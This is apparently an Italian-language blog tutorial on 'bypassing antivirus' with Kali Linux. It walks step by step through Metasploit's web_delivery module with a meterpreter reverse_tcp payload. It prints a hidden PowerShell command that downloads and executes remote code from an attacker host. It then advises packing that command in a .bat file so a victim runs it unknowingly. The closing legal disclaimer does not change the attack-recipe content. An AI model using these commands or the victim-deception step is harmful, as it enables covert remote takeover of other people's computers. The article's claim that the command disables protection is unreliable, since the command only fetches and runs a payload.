Avete sentito molte volte parlare di modi per entrare in altri PC da remoto con l’utilizzo di backdoor o altri metodi per riuscire ad avere il pieno controllo di una macchina in esecuzione in remoto; ma a volte ciò di cui stiamo parlando trova un ostacolo; nel mondo di internet abbiamo molti sistemi di protezione efficienti che ognuno di noi, per fortuna, ha installato sul proprio PC. Ma siamo ugualmente al sicuro? Certo che no. Vi ricordo che in informatica tutto è possibile, tutto può essere in qualche modo bypassato ed è quello che andremo a vedere oggi, ovvero come riuscire ad evadere la protezione da un antivirus installato su un computer sul quale vorremo testare il funzionamento di una backdoor. Come sempre vi elencherò semplici passaggi mediante i quali riuscirete ad arrivare ad un “bypass” dei firewall presenti su di un sistema. Vi ricordo che per fare ciò avrete bisogno di Kali Linux, che sarà sempre il nostro punto di riferimento per svolgere azioni di penetration testing. Iniziamo subito!

-Per prima cosa aprite un terminale e digitate il comando “msfconsole”, che andrà ad attivare appunto la console di Metasploit Framework

 

Bypassare un antivirus con Kali Linux

 

 

 

 

 

 

Aperto il terminale andremo a digitare questa serie di comandi:

-use exploit/multi/script/web_delivery

 

Bypassare un antivirus con Kali Linux

 

 

 

 

 

 

-show targets

Bypassare un antivirus con Kali Linux

 

 

 

 

 

 

 

-set target 2

N.B: In realtà potremo scegliere in alternativa al target 2 anche il target 0 oppure il target 1, ma personalmente ritengo che il 2 sia quello più funzionale.
Bypassare un antivirus con Kali Linux

 

 

 

 

 

 

-set PAYLOAD windows/meterpreter/reverse_tcp

Bypassare un antivirus con Kali Linux

 

 

 

 

 

 

-set LHOST “IP locale”

Bypassare un antivirus con Kali Linux

 

 

 

 

 

 

-set LPORT “porta locale”

Bypassare un antivirus con Kali Linux

 

 

 

 

 

 

-set uripath /

Bypassare un antivirus con Kali Linux

 

 

 

 

 

 

-exploit -j

Bypassare un antivirus con Kali Linux

 

 

 

 

 

 

Il terminale di msfconsole ci dirà di digitare sul cmd del computer da attaccare un comando simile a questo:
powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring(‘https://192.168.1.100:8080/’);
Adesso, eseguito quest’ultimo comando sulla macchina remota, avremo la massima libertà di eseguire attacchi su quel PC in quanto non sarà più immune dagli attacchi. Per evitare di agire personalmente sul computer interessato dall’attacco, potete inviare alla vittima un file in .bat contenente il codice da eseguire sul cmd; in tal modo sarà la stessa vittima che, aprendo il file, andrà a disattivare la protezione del suo PC senza che se ne accorga minimamente.

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).